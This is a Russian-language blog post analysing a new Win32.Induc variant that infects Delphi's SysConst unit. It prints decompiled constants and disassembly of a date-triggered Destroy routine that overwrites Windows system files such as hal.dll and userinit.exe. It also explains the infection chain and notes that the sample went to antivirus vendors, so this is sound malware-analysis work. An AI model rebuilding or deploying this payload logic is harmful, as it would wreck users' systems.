Win32.Induc возвращается
...
const
dcu =
0: яяяя....dcu.|FF FF FF FF 03 00 00 00 64 63 75 00|;
pas =
0: яяяя....pas.|FF FF FF FF 03 00 00 00 70 61 73 00|;
imp =
00: яяяя....implemen|FF FF FF FF 0E 00 00 00 69 6D 70 6C 65 6D 65 6E|
10: tation. |74 61 74 69 6F 6E 00|;
DS1 =
00: яяяя....Software|FF FF FF FF 18 00 00 00 53 6F 66 74 77 61 72 65|
10: \Borland\Delphi\|5C 42 6F 72 6C 61 6E 64 5C 44 65 6C 70 68 69 5C|
20: . |00|;
DS2 =
00: яяяя....RootDir.|FF FF FF FF 07 00 00 00 52 6F 6F 74 44 69 72 00|;
DS3 =
00: яяяя....\source\|FF FF FF FF 18 00 00 00 5C 73 6F 75 72 63 65 5C|
10: rtl\sys\SysConst|72 74 6C 5C 73 79 73 5C 53 79 73 43 6F 6E 73 74|
20: . |00|;
DS4 =
00: яяяя....\lib\Sys|FF FF FF FF 0E 00 00 00 5C 6C 69 62 5C 53 79 73|
10: Const.. |43 6F 6E 73 74 2E 00|;
DS5 =
00: яяяя....\bin\dcc|FF FF FF FF 10 00 00 00 5C 62 69 6E 5C 64 63 63|
10: 32.exe" . |33 32 2E 65 78 65 22 20 00|;
v40 =
0: яяяя....4.0.|FF FF FF FF 03 00 00 00 34 2E 30 00|;
v50 =
0: яяяя....5.0.|FF FF FF FF 03 00 00 00 35 2E 30 00|;
v60 =
0: яяяя....6.0.|FF FF FF FF 03 00 00 00 36 2E 30 00|;
v70 =
0: яяяя....7.0.|FF FF FF FF 03 00 00 00 37 2E 30 00|;
apo = '"'{#$22};
msgwr =
00: яяяя"...Carpathi|FF FF FF FF 22 00 00 00 43 61 72 70 61 74 68 69|
10: an Forest CF1.0 |61 6E 20 46 6F 72 65 73 74 20 43 46 31 2E 30 20|
20: LiveUndead. |4C 69 76 65 55 6E 64 65 61 64 00|;
smsg =
00: яяяя....TODAY IS|FF FF FF FF 1B 00 00 00 54 4F 44 41 59 20 49 53|
10: A GOOD DAY TO D|20 41 20 47 4F 4F 44 20 44 41 59 20 54 4F 20 44|
20: IE.. |49 45 2E 00|;
hal =
00: яяяя....system32|FF FF FF FF 10 00 00 00 73 79 73 74 65 6D 33 32|
10: \hal.dll. |5C 68 61 6C 2E 64 6C 6C 00|;
unm =
00: яяяя....system32|FF FF FF FF 13 00 00 00 73 79 73 74 65 6D 33 32|
10: \urlmon.dll. |5C 75 72 6C 6D 6F 6E 2E 64 6C 6C 00|;
inut =
00: яяяя....system32|FF FF FF FF 15 00 00 00 73 79 73 74 65 6D 33 32|
10: \userinit.exe. |5C 75 73 65 72 69 6E 69 74 2E 65 78 65 00|;
fsad =
00: яяяя....system32|FF FF FF FF 13 00 00 00 73 79 73 74 65 6D 33 32|
10: \logoff.exe. |5C 6C 6F 67 6F 66 66 2E 65 78 65 00|;
ghfg =
00: яяяя....system32|FF FF FF FF 15 00 00 00 73 79 73 74 65 6D 33 32|
10: \rasapi32.dll. |5C 72 61 73 61 70 69 33 32 2E 64 6C 6C 00|;
ploha =
00: яяяя....explorer|FF FF FF FF 0C 00 00 00 65 78 70 6C 6F 72 65 72|
10: .exe. |2E 65 78 65 00|;
sendfromagod =
00: яяяя....C:\ntdet|FF FF FF FF 0F 00 00 00 43 3A 5C 6E 74 64 65 74|
10: ect.com. |65 63 74 2E 63 6F 6D 00|;
bih =
00: яяяя....HKLM\Sof|FF FF FF FF 1A 00 00 00 48 4B 4C 4D 5C 53 6F 66|
10: tware\Borland\BD|74 77 61 72 65 5C 42 6F 72 6C 61 6E 64 5C 42 44|
20: S\. |53 5C 00|;
sco =
00: яяяя....source\W|FF FF FF FF 1D 00 00 00 73 6F 75 72 63 65 5C 57|
10: in32\rtl\sys\Sys|69 6E 33 32 5C 72 74 6C 5C 73 79 73 5C 53 79 73|
20: Const. |43 6F 6E 73 74 00|;
cg =
00: яяяя....HKLM\Sof|FF FF FF FF 1B 00 00 00 48 4B 4C 4D 5C 53 6F 66|
10: tware\CodeGear\B|74 77 61 72 65 5C 43 6F 64 65 47 65 61 72 5C 42|
20: DS\. |44 53 5C 00|;
function A (s: System.AnsiString): System.AnsiString;
...
procedure B (s: System.AnsiString; d: System.AnsiString;
...
function C (T: System.PChar): System.AnsiString;
...
procedure Destroy;
var
Windir: array[$0..$FF] of System.Char;
i: System.Integer;
Winter: System.AnsiString;
W: Windows.DWORD;
begin
00000000 : // -- Line #234 --
00000000 : 55 PUSH EBP{W}
00000001 : 8B EC MOV EBP{W},ESP
00000003 : 81 C4 E4 FE FF FF ADD ESP,$FFFFFEE4
00000009 : 53 PUSH EBX
0000000A : 56 PUSH ESI
0000000B : 33 C0 XOR EAX,EAX
0000000D : 89 85 E4 FE FF FF MOV DWORD PTR [EBP-284],EAX
00000013 : 89 85 E8 FE FF FF MOV DWORD PTR [EBP-280],EAX
00000019 : 89 85 EC FE FF FF MOV DWORD PTR [EBP-276],EAX
0000001F : 89 85 F0 FE FF FF MOV DWORD PTR [EBP-272],EAX
00000025 : 89 85 F4 FE FF FF MOV DWORD PTR [EBP-268],EAX
0000002B : 89 85 F8 FE FF FF MOV DWORD PTR [EBP-264],EAX
00000031 : 89 45 FC MOV DWORD PTR [EBP-4{Winter}],EAX
00000034 : 33 C0 XOR EAX,EAX
00000036 : 55 PUSH EBP{W}
00000037 : 68(A0 01 00 00 PUSH Destroy{0xC6}+416
0000003C : 64 FF 30 PUSH DWORD PTR FS:[EAX]
0000003F : 64 89 20 MOV DWORD PTR FS:[EAX],ESP
00000000 : // -- Line #235 --
00000042 : 8D 85 FC FE FF FF LEA EAX,DWORD PTR [EBP-260]
00000048 : 33 C9 XOR ECX,ECX
0000004A : BA 00 01 00 00 MOV EDX,$00000100
0000004F : E8(00 00 00 00 CALL @FillChar{0x2A}
00000000 : // -- Line #236 --
00000054 : 68 FF 00 00 00 PUSH $000000FF
00000059 : 8D 85 FC FE FF FF LEA EAX,DWORD PTR [EBP-260]
0000005F : 50 PUSH EAX
00000060 : E8(00 00 00 00 CALL GetWindowsDirectory{0x65}
00000000 : // -- Line #237 --
00000065 : 33 F6 XOR ESI,ESI
00000067 : 8D 9D FC FE FF FF LEA EBX,DWORD PTR [EBP-260]
00000000 : // -- Line #238 --
0000006D : 8D 45 FC LEA EAX,DWORD PTR [EBP-4{Winter}]
00000070 : E8(00 00 00 00 CALL @UniqueStringA{0xB}
00000075 : 8A 13 MOV DL,BYTE PTR [EBX]
00000077 : 88 54 30 FF MOV BYTE PTR [EAX+ESI{i}-1],DL
0000007B : 46 INC ESI{i}
0000007C : 43 INC EBX
00000000 : // -- Line #237 --
0000007D : 81 FE 00 01 00 00 CMP ESI{i},$00000100
00000083 : 75 E8 JNE -24; (0x6D)
00000000 : // -- Line #239 --
00000085 : 8B 45 FC MOV EAX,DWORD PTR [EBP-4{Winter}]
00000088 : E8(00 00 00 00 CALL @LStrLen{0x8}
0000008D : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
00000090 : 80 7C 02 FF 5C CMP BYTE PTR [EDX+EAX-1],$5C
00000095 : 74 0D JE +13; (0xA4)
00000000 : // -- Line #240 --
00000097 : 8D 45 FC LEA EAX,DWORD PTR [EBP-4{Winter}]
0000009A : BA(B8 01 00 00 MOV EDX,Destroy{0xC6}+440
0000009F : E8(00 00 00 00 CALL @LStrCat{0x34}
00000000 : // -- Line #241 --
000000A4 : 8D 85 F8 FE FF FF LEA EAX,DWORD PTR [EBP-264]
000000AA : B9(C4 01 00 00 MOV ECX,Destroy{0xC6}+452
000000AF : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
000000B2 : E8(00 00 00 00 CALL @LStrCat3{0x2D}
000000B7 : 8B 85 F8 FE FF FF MOV EAX,DWORD PTR [EBP-264]
000000BD : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #242 --
000000C2 : 8D 85 F4 FE FF FF LEA EAX,DWORD PTR [EBP-268]
000000C8 : B9(E0 01 00 00 MOV ECX,Destroy{0xC6}+480
000000CD : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
000000D0 : E8(00 00 00 00 CALL @LStrCat3{0x2D}
000000D5 : 8B 85 F4 FE FF FF MOV EAX,DWORD PTR [EBP-268]
000000DB : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #243 --
000000E0 : 8D 85 F0 FE FF FF LEA EAX,DWORD PTR [EBP-272]
000000E6 : B9(FC 01 00 00 MOV ECX,Destroy{0xC6}+508
000000EB : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
000000EE : E8(00 00 00 00 CALL @LStrCat3{0x2D}
000000F3 : 8B 85 F0 FE FF FF MOV EAX,DWORD PTR [EBP-272]
000000F9 : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #244 --
000000FE : 8D 85 EC FE FF FF LEA EAX,DWORD PTR [EBP-276]
00000104 : B9(1C 02 00 00 MOV ECX,Destroy{0xC6}+540
00000109 : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
0000010C : E8(00 00 00 00 CALL @LStrCat3{0x2D}
00000111 : 8B 85 EC FE FF FF MOV EAX,DWORD PTR [EBP-276]
00000117 : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #245 --
0000011C : 8D 85 E8 FE FF FF LEA EAX,DWORD PTR [EBP-280]
00000122 : B9(38 02 00 00 MOV ECX,Destroy{0xC6}+568
00000127 : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
0000012A : E8(00 00 00 00 CALL @LStrCat3{0x2D}
0000012F : 8B 85 E8 FE FF FF MOV EAX,DWORD PTR [EBP-280]
00000135 : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #246 --
0000013A : 8D 85 E4 FE FF FF LEA EAX,DWORD PTR [EBP-284]
00000140 : B9(58 02 00 00 MOV ECX,Destroy{0xC6}+600
00000145 : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
00000148 : E8(00 00 00 00 CALL @LStrCat3{0x2D}
0000014D : 8B 85 E4 FE FF FF MOV EAX,DWORD PTR [EBP-284]
00000153 : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #247 --
00000158 : B8(70 02 00 00 MOV EAX,Destroy{0xC6}+624
0000015D : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #248 --
00000162 : E8(00 00 00 00 CALL Files{0xC4}
00000000 : // -- Line #249 --
00000167 : 6A 00 PUSH $00
00000169 : 68(80 02 00 00 PUSH Destroy{0xC6}+640
0000016E : 68(9C 02 00 00 PUSH Destroy{0xC6}+668
00000173 : 6A 00 PUSH $00
00000175 : E8(00 00 00 00 CALL MessageBox{0x66}
0000017A : 33 C0 XOR EAX,EAX
0000017C : 5A POP EDX
0000017D : 59 POP ECX
0000017E : 59 POP ECX
0000017F : 64 89 10 MOV DWORD PTR FS:[EAX],EDX
00000182 : 68(A7 01 00 00 PUSH Destroy{0xC6}+423
00000187 : 8D 85 E4 FE FF FF LEA EAX,DWORD PTR [EBP-284]
0000018D : BA 06 00 00 00 MOV EDX,$00000006
00000192 : E8(00 00 00 00 CALL @LStrArrayClr{0x30}
00000197 : 8D 45 FC LEA EAX,DWORD PTR [EBP-4{Winter}]
0000019A : E8(00 00 00 00 CALL @LStrClr{0xE}
0000019F : C3 RET NEAR
000001A0 : E9(00 00 00 00 JMP @HandleFinally{0xF}
000001A5 : EB E0 JMP -32; (0x187)
00000000 : // -- Line #250 --
000001A7 : 5E POP ESI
000001A8 : 5B POP EBX
000001A9 : 8B E5 MOV ESP,EBP{W}
000001AB : 5D POP EBP{W}
000001AC : C3 RET NEAR
000001AD : 00 00 ADD BYTE PTR [EAX],AL
000001AF : 00 FF ADD BH,BH
000001B1 : FF FF ? EDI
000001B3 : FF 01 INC DWORD PTR [ECX]
000001B5 : 00 00 ADD BYTE PTR [EAX],AL
000001B7 : 00 5C 00 00 ADD BYTE PTR [EAX+EAX0],BL
000001BB : 00 FF ADD BH,BH
000001BD : FF FF ? EDI
000001BF : FF 10 CALL DWORD PTR [EAX],NEAR
000001C1 : 00 00 ADD BYTE PTR [EAX],AL
000001C3 : 00 73 79 ADD BYTE PTR [EBX+121],DH
000001C6 : 73 74 JNB +116; (0x23C)
000001C8 : 65 6D INSW
000001CA : 33 32 XOR ESI,DWORD PTR [EDX]
000001CC : 5C POP ESP
000001CD : 68 61 6C 2E 64 PUSH $642E6C61
000001D2 : 6C INSB
000001D3 : 6C INSB
000001D4 : 00 00 ADD BYTE PTR [EAX],AL
000001D6 : 00 00 ADD BYTE PTR [EAX],AL
000001D8 : FF FF ? EDI
000001DA : FF FF ? EDI
000001DC : 13 00 ADC EAX,DWORD PTR [EAX]
000001DE : 00 00 ADD BYTE PTR [EAX],AL
000001E0 : 73 79 JNB +121; (0x25B)
000001E2 : 73 74 JNB +116; (0x258)
000001E4 : 65 6D INSW
000001E6 : 33 32 XOR ESI,DWORD PTR [EDX]
000001E8 : 5C POP ESP
000001E9 : 75 72 JNE +114; (0x25D)
000001EB : 6C INSB
000001EC : 6D INSW
000001ED : 6F OUTSW
000001EE : 6E OUTSB
000001EF : 2E 64 6C INSB
000001F2 : 6C INSB
000001F3 : 00 FF ADD BH,BH
000001F5 : FF FF ? EDI
000001F7 : FF 15 00 00 00 73 CALL DWORD PTR [$73000000],NEAR
000001FD : 79 73 JNS +115; (0x272)
000001FF : 74 65 JE +101; (0x266)
00000201 : 6D INSW
00000202 : 33 32 XOR ESI,DWORD PTR [EDX]
00000204 : 5C POP ESP
00000205 : 75 73 JNE +115; (0x27A)
00000207 : 65 72 69 JB +105; (0x273)
0000020A : 6E OUTSB
0000020B : 69 74 2E 65 78 65 00 00 IMUL DWORD PTR [ESI+EBP{W}+101],$00006578
00000213 : 00 FF ADD BH,BH
00000215 : FF FF ? EDI
00000217 : FF 13 CALL DWORD PTR [EBX],NEAR
00000219 : 00 00 ADD BYTE PTR [EAX],AL
0000021B : 00 73 79 ADD BYTE PTR [EBX+121],DH
0000021E : 73 74 JNB +116; (0x294)
00000220 : 65 6D INSW
00000222 : 33 32 XOR ESI,DWORD PTR [EDX]
00000224 : 5C POP ESP
00000225 : 6C INSB
00000226 : 6F OUTSW
00000227 : 67 6F OUTSW
00000229 : 66 66 2E 65 78 65 JS +101; (0x294)
0000022F : 00 FF ADD BH,BH
00000231 : FF FF ? EDI
00000233 : FF 15 00 00 00 73 CALL DWORD PTR [$73000000],NEAR
00000239 : 79 73 JNS +115; (0x2AE)
0000023B : 74 65 JE +101; (0x2A2)
0000023D : 6D INSW
0000023E : 33 32 XOR ESI,DWORD PTR [EDX]
00000240 : 5C POP ESP
00000241 : 72 61 JB +97; (0x2A4)
00000243 : 73 61 JNB +97; (0x2A6)
00000245 : 70 69 JO +105; (0x2B0)
00000247 : 33 32 XOR ESI,DWORD PTR [EDX]
00000249 : 2E 64 6C INSB
0000024C : 6C INSB
0000024D : 00 00 ADD BYTE PTR [EAX],AL
0000024F : 00 FF ADD BH,BH
00000251 : FF FF ? EDI
00000253 : FF 0C 00 DEC DWORD PTR [EAX+EAX]
00000256 : 00 00 ADD BYTE PTR [EAX],AL
00000258 : 65 78 70 JS +112; (0x2CB)
0000025B : 6C INSB
0000025C : 6F OUTSW
0000025D : 72 65 JB +101; (0x2C4)
0000025F : 72 2E JB +46; (0x28F)
00000261 : 65 78 65 JS +101; (0x2C9)
00000264 : 00 00 ADD BYTE PTR [EAX],AL
00000266 : 00 00 ADD BYTE PTR [EAX],AL
00000268 : FF FF ? EDI
0000026A : FF FF ? EDI
0000026C : 0F 00 00 SLDT WORD PTR [EAX]
0000026F : 00 43 3A ADD BYTE PTR [EBX+58],AL
00000272 : 5C POP ESP
00000273 : 6E OUTSB
00000274 : 74 64 JE +100; (0x2DA)
00000276 : 65 74 65 JE +101; (0x2DE)
00000279 : 63 ARPL
0000027A : 74 2E JE +46; (0x2AA)
0000027C : 63 ARPL
0000027D : 6F OUTSW
0000027E : 6D INSW
0000027F : 00 54 4F 44 ADD BYTE PTR [EDI+2*ECX+68],DL
00000283 : 41 INC ECX
00000284 : 59 POP ECX
00000285 : 20 49 53 AND BYTE PTR [ECX+83],CL
00000288 : 20 41 20 AND BYTE PTR [ECX+32],AL
0000028B : 47 INC EDI
0000028C : 4F DEC EDI
0000028D : 4F DEC EDI
0000028E : 44 INC ESP
0000028F : 20 44 41 59 AND BYTE PTR [ECX+2*EAX+89],AL
00000293 : 20 54 4F 20 AND BYTE PTR [EDI+2*ECX+32],DL
00000297 : 44 INC ESP
00000298 : 49 DEC ECX
00000299 : 45 INC EBP{W}
0000029A : 2E 00 43 61 ADD BYTE PTR CS:[EBX+97],AL
0000029E : 72 70 JB +112; (0x310)
000002A0 : 61 POPA
000002A1 : 74 68 JE +104; (0x30B)
000002A3 : 69 61 6E 20 46 6F 72 IMUL DWORD PTR [ECX+110],$726F4620
000002AA : 65 73 74 JNB +116; (0x321)
000002AD : 20 43 46 AND BYTE PTR [EBX+70],AL
000002B0 : 31 2E XOR DWORD PTR [ESI],EBP{W}
000002B2 : 30 20 XOR BYTE PTR [EAX],AH
000002B4 : 4C DEC ESP
000002B5 : 69 76 65 55 6E 64 65 IMUL DWORD PTR [ESI+101],$65646E55
000002BC : 61 POPA
000002BD : 64 00 00 ADD BYTE PTR FS:[EAX],AL
end;
...
procedure CheckDestroy;
var
W: Windows._SYSTEMTIME;
begin
00000000 : // -- Line #616 --
00000000 : 83 C4 F0 ADD ESP,-16
00000000 : // -- Line #617 --
00000003 : 54 PUSH ESP
00000004 : E8(00 00 00 00 CALL GetSystemTime{0x74}
00000000 : // -- Line #618 --
00000009 : 66 81 3C 24 DA 07 CMP WORD PTR [ESP],$07DA
0000000F : 76 05 JBE +5; (0x16)
00000000 : // -- Line #619 --
00000011 : E8(00 00 00 00 CALL Destroy{0xC6}
00000000 : // -- Line #621 --
00000016 : 66 81 3C 24 DA 07 CMP WORD PTR [ESP],$07DA
0000001C : 75 0D JNE +13; (0x2B)
00000000 : // -- Line #622 --
0000001E : 66 83 7C 24 02 09 CMP WORD PTR [ESP+2],9
00000024 : 76 05 JBE +5; (0x2B)
00000000 : // -- Line #623 --
00000026 : E8(00 00 00 00 CALL Destroy{0xC6}
00000000 : // -- Line #625 --
0000002B : 66 81 3C 24 DA 07 CMP WORD PTR [ESP],$07DA
00000031 : 75 15 JNE +21; (0x48)
00000000 : // -- Line #626 --
00000033 : 66 83 7C 24 02 09 CMP WORD PTR [ESP+2],9
00000039 : 75 0D JNE +13; (0x48)
00000000 : // -- Line #627 --
0000003B : 66 83 7C 24 06 0D CMP WORD PTR [ESP+6],13
00000041 : 72 05 JB +5; (0x48)
00000000 : // -- Line #628 --
00000043 : E8(00 00 00 00 CALL Destroy{0xC6}
00000000 : // -- Line #629 --
00000048 : 83 C4 10 ADD ESP,16
0000004B : C3 RET NEAR
end;
...
end.
ну и всё это дело действительно разбавлено некоторым количеством старых антиотладочных трюков, якобы и реализующих весь функционал модуля.
Узнаёте? Win32.induc, но уже с деструктивной нагрузкой и, видимо, поддерживающий версии delphi старше 7. Запустил в песочнице, при инициализации модуля добавляет вредоносный код в SysConst.pas, компилит его в SysConst.dcu, содержимое исходного файла затирает, пишет туда "Carpathian Forest CF1.0 LiveUndead". В один прекрасный день (а точнее 13 сентября 2010 года) программа, собранная на заражённой машине, скажет "TODAY IS A GOOD DAY TO DIE" и грохнет систему.
На 03.03.10 модуль не детектится никем почти никем (макафи эвристикой видит подозрительный файл), заражённые программы почти так же (икарус - Win32.Banload, CAT-QuickHeal молодца - W32.Induc.A)
Такие дела. Отправил семпл докторвебу и касперскому, подождём официальных комментариев.
Комментарии
Отправить комментарий